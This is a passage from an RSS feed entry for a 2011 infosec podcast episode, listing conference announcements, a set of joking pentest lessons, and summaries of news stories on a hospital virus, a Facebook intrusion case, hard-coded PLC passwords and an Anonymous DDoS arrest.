	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 1pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&ldquo;Pentest Lessons&quot;</span></p>
<p>
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1. Boris needs his coffee before any attempts at humor can be made.</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2. &ldquo;As long as the perimeter is secure, nothing else matters.&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3. Never say &ldquo;Oh, shit!&rdquo; or &ldquo;God Damn It!&rdquo; on a customer location</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4. &ldquo;How did you bypass SSL like that?&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5. &nbsp;When you pop a box during an internal assessment, don&rsquo;t shout out &ldquo;I own that shiz&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6. &ldquo;Don&rsquo;t ever include anything in report that wasn&rsquo;t part of scope&rdquo;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 7. If you get detained/arrested during an engagement, never say &ldquo;Is that tazer real?&rdquo;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 8. If you can&rsquo;t make it through the door on your own a Latina always works</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 9. Don&rsquo;t click suspicious links on client owned hardware or machines with client data on it</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 10. Don&rsquo;t add Linkedin connections based on you&rsquo;re friends acceptance.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Gwinnett Medical Center in Lawrenceville, Georgia, suffered a serious computer virus infection that temporarily disabled their services, the medical facility being able to provide help only to those who had extreme emergencies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">WSBTV reports that the virus affected the hospital&rsquo;s networks, employees being forced to turn back to the good old fashioned paper and pen to perform their tasks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We&#39;ve had a virus to interrupt our system within our hospital,&rdquo; revealed a Gwinnett Medical Center representative. &ldquo;It&#39;s not affecting patient care in any way, shape or form.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fortunately, only the network connections were affected by the virus that allegedly quickly spread from a device to the other. The databases that contain medical records and other patient information were not harmed.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Wednesday, the facility declared &ldquo;total diversion,&rdquo; which resulted in the fact that most of the patients had to be redirected to other hospitals. Two days later the status changed to &ldquo;trauma diversion&rdquo; and by Saturday, the online systems were back on track.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We actually have some of our IT vendor partners that are on site with us that have actually been here since Wednesday,&rdquo; the representative said. &ldquo;We&#39;ve also got internal teams that are trying to identify the virus issues.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The source of the virus is currently unknown, but it shouldn&rsquo;t surprise anyone if one of the employees opened a malicious email that either warned of a security update or maybe even some fabulous offer that just couldn&rsquo;t have been turned down.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/14/nhs_facebook_twitter/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/14/nhs_facebook_twitter/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The author of recent guidance on using social media for nurses and midwives says NHS managers should be able to actively respond to issues around how their staff use social media.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Andy Jaeger, assistant director of public and professional communications at the Nursing and Midwifery Council (NMC) and author of recent guidance on social media, says that NHS managers must be better equipped to handle issues around social media.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The regulator has seen an increase in the number of enquiries from nurses and midwives about social media and referrals that directly relate to social networking, but despite this there are still managers who are &quot;social media refuseniks&quot;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;One of things that we say in our advice is that if a manager has responsibility for investing in a complaint about the use of a social networking site, that they should join the social networking site so that they understand the mechanics of how it works. People need to familiarise themselves with this kind of thing,&quot; he says.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;I think actually what it needs is a robust response at a local level. In our advice much of what we&#39;ve done is interpret the standards that already exist around conduct, performance and ethics. We&#39;re just helping people to understand what it is that is going on and then act appropriately.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But he says: &quot;that really is better done not with a set of national guidelines from the Department of Health, but with local managers taking responsibility and understanding the issue and dealing with it for themselves.&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.youhavedownloaded.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.youhavedownloaded.com/</span></a><br />
	<a href="http://www.youhavedownloaded.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">YouHaveDownloaded.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> is a site that monitors 20% of all public downloads, immediately telling you if you are a downloader or not, and even if you&rsquo;re found &quot;not guilty,&quot; then you&rsquo;re suspected of using a private torrent tracker.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Of course, you can check to see if other people have downloaded something and if you want to scare them, you can do so with a special feature offered by the site. Widgets for websites, blogs and even Facebook profiles are made available for customers.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Suren Ter, Ruslan K and Ilia R are the masterminds behind YouHaveDownloaded.com. </span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;I&rsquo;m a producer of the site. Like a movie producer, I made the site. Russlan is a visionary. He did the necessary research and invented the technical tricks. Ilia is a programmer. He does the code. You see those tables, html and widgets? He did it. Me? I don&rsquo;t do code, I don&rsquo;t do research, I don&rsquo;t do design &mdash; I do sites,&rdquo; Suren Ter says.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.mirror.co.uk/news/top-stories/2011/12/14/facebook-hacker-admits-breaking-into-social-network-s-servers-115875-23633578/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.mirror.co.uk/news/top-stories/2011/12/14/facebook-hacker-admits-breaking-into-social-network-s-servers-115875-23633578/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A COMPUTER hacker yesterday admitted breaking into Facebook&rsquo;s servers. &nbsp;Glenn Mangham, 26, repeatedly breached the social network website this year in what a court heard was one of the most shocking examples of its kind.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Southwark crown court heard Mangham &shy;downloaded his own programmes on to the internal server.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Prosecutor Sandip Patel said: &ldquo;He was able to access the private side of Facebook and steal highly sensitive intellectual property. Private data was not compromised&#8230; it was never the intention to compromise customer data.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">But he added: &ldquo;It was and is the most effective and egregious examples of hacking into a website that has come before a British court.&rdquo;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mangham, of York, admitted four hacking charges. He said he aimed to identify weak spots in Facebook&rsquo;s security.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Mangham was released on bail and will be sentenced on February 17.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.theregister.co.uk/2011/12/14/scada_bugs_threaten_criticial_infrastructure/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/14/scada_bugs_threaten_criticial_infrastructure/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An electronic device used to control machinery in water plants and other industrial facilities contains serious weaknesses that allow attackers to take it over remotely, the US agency that safeguards the nation&#39;s critical infrastructure has warned.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Some models of the </span><a href="http://products.schneider-electric.us/products-services/products/plcs-pac-and-distributed-io/industrial-process-infrastructure-and-oems/quantum-plc/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Modicon Quantum PLC</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> used in industrial control systems contain multiple hidden accounts that use predetermined passwords to grant remote access, the Industrial Control System Cyber Emergency Response Team said in an </span><a href="http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-11-346-01.pdf"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">advisory</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> (PDF) issued on Tuesday. Palatine, Illinois&ndash;based Schneider Electric, the maker of the device, has produced fixes for some of the weaknesses and continues to develop additional mitigations.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The PLCs, or programmable logic controllers, reside at the lowest levels of an industrial plant, where computerized sensors meet the valves, turbines, or other machinery that&#39;s being controlled. The default passwords are hard-coded into Ethernet cards the systems use to funnel commands into the devices, and temperatures and other data out of them. The Ethernet modules also allow administrators to remotely log into the machinery using protocols such as telnet, FTP, and something called the Windriver Debug port.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">According to a </span><a href="http://reversemode.com/index.php?option=com_content&amp;task=view&amp;id=80&amp;Itemid=1"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">blog post</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> published on Monday by independent security researcher Rub&eacute;n Santamarta, the NOE 100 and NOE 771 modules contain at least 14 hard-coded passwords, some of which are published in support manuals. Even in cases where the passcodes are obscured using cryptographic hashes, they are trivial to recover thanks to </span><a href="https://community.rapid7.com/community/metasploit/blog/2010/08/02/shiny-old-vxworks-vulnerabilities"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">documented weaknesses in the underlying VxWorks operating system</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">. As a result, attackers can exploit the weakness to log into devices and gain privileged access to its controls.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://www.thedailybeast.com/articles/2011/12/13/anonymous-hacker-arrested-for-attack-on-gene-simmons-s-website.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.thedailybeast.com/articles/2011/12/13/anonymous-hacker-arrested-for-attack-on-gene-simmons-s-website.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A member of the international hacker group Anonymous was arrested this morning after he conducted a sophisticated cyberattack on a website operated by KISS rocker and Family Jewels star Gene Simmons. Kevin George Poe, 24, was taken into custody by federal authorities at his home in Manchester, Conn. He is charged with two federal counts of conspiracy and unauthorized impairment of a protected computer. If convicted, Poe could face up to 15 years in federal prison.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We evaluated servers and were able to discern an IP address that brought us to him,&rdquo; said Thom Mrozek, a spokesman for the U.S. Attorney&rsquo;s Office in Los Angeles. &ldquo;There was a significant amount of forensic work involved. We are dealing with a group that is quite sophisticated and will take efforts to conceal their identity.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Last week, a federal grand jury in Los Angeles returned an indictment that accused Poe, who used the screen name spydr101, of allegedly conducting an elaborate distributed denial of service (DDoS) against Simmons&rsquo;s website, GeneSimmons.com. The cyberattack sent tens of thousands of electronic requests to Simmons&rsquo;s website with the purpose of overloading the computer server and rendering the website useless. According to the indictment, Poe used a software tool that is widely used by Anonymous called Low Orbit Ion Cannon, which is a computer program that sends extremely large numbers of &ldquo;packets&rdquo; or requests over a network in an attempt to sabotage a computer.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The cyberattack occurred during a five-day period in October 2010 as part of Operation Payback, a long-running campaign by Anonymous to sabotage organizations that are involved in anti-piracy campaigns such as the Recording Industry Association of America and the Motion Picture Association of America.</span><br />
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3274/0/infosec-daily-podcast-episode-546.mp3" length="17108259" type="audio/mpeg" />
		<itunes:duration>0:35:36</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.

	Announcements:
Brad Smith (theNurse)
	We all know and love Brad S[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.

	Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
&#8220;Pentest Lessons&#34;

	Lesson 1. Boris needs his coffee before any attempts at humor can be made.
	Lesson 2. &#8220;As long as the perimeter is secure, nothing else matters.&#8221;
	Lesson 3. Never say &#8220;Oh, shit!&#8221; or &#8220;God Damn It!&#8221; on a customer location
	Lesson 4. &#8220;How did you bypass SSL like that?&#8221;
	Lesson 5. &#160;When you pop a box during an internal assessment, don&#8217;t shout out &#8220;I own that shiz&#8221;
	Lesson 6. &#8220;Don&#8217;t ever include anything in report that wasn&#8217;t part of scope&#8221;
Lesson 7. If you get detained/arrested during an engagement, never say &#8220;Is that tazer real?&#8221;
Lesson 8. If you can&#8217;t make it through the door on your own a Latina always works
Lesson 9. Don&#8217;t click suspicious links on client owned hardware or machines with client data on it
Lesson 10. Don&#8217;t add Linkedin connections based on you&#8217;re friends acceptance.
&#160;
Stories
Source: http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/
	The Gwinnett Medical Center in Lawrenceville, Georgia, suffered a serious computer virus infection that temporarily disabled their services, the medical facility being able to provide help only to those who had extreme emergencies.
	WSBTV reports that the virus affected the hospital&#8217;s networks, employees being forced to turn back to the good old fashioned paper and pen to perform their tasks.
	&#8220;We&#39;ve had a virus to interrupt our system within our hospital,&#8221; revealed a Gwinnett Medical Center representative. &#8220;It&#39;s not affecting patient care in any way, shape or form.&#8221;
	Fortunately, only the network connections were affected by the virus that allegedly quickly spread from a device to the other. The databases that contain medical records and other patient information were not harmed.
	On Wednesday, the facility declared &#8220;total diversion,&#8221; which resulted in the fact that most of the patients had to be redirected to other hospitals. Two days later the status changed to [...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 545 &#8211; Most Secure Browser, A Few Chinese, WinPhones, Industrial Espionage, Nitro &amp; Addicted Workers</title>
